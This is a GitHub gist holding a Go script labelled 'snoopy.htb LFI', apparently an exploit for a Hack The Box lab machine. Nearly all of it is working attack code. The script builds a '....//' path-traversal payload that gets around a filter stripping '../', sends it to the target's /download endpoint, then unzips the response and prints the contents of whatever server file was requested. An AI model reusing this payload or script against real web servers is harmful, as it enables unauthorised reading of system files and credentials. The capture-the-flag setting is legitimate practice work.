Skip to content

Instantly share code, notes, and snippets.

@rudSarkar

rudSarkar/main.go

Created May 27, 2023 14:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rudSarkar/2774501105414e9b3a07e80e9385fe1c to your computer and use it in GitHub Desktop.
Save rudSarkar/2774501105414e9b3a07e80e9385fe1c to your computer and use it in GitHub Desktop.
Download ZIP
snoopy.htb LFI
Raw
main.go
package main
import (
"archive/zip"
"fmt"
"io"
"net/http"
"net/url"
"os"
)
func checkError(err error) {
if err != nil {
return
}
}
func main() {
var URL string = "http://snoopy.htb"
var Resource string = "/download"
params := url.Values{}
var Payload string
fmt.Printf("Enter file location: ")
fmt.Scanf("%v", &Payload)
params.Add("file", fmt.Sprintf("....//....//....//....//....//....//....//....//....//....//....//..../%v", Payload))
buildUrl, _ := url.Parse(URL)
buildUrl.Path = Resource
buildUrl.RawQuery = params.Encode()
urlStr := fmt.Sprintf("%v", buildUrl)
res, err := http.Get(urlStr)
checkError(err)
defer res.Body.Close()
body, err := io.ReadAll(res.Body)
if err := os.WriteFile("test.zip", body, 0644); err != nil {
return
}
unzipData, err := zip.OpenReader("test.zip")
checkError(err)
defer unzipData.Close()
for _, file := range unzipData.File {
optReader, err := file.Open()
checkError(err)
defer optReader.Close()
opt, err := io.ReadAll(optReader)
checkError(err)
fmt.Printf(string(opt))
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment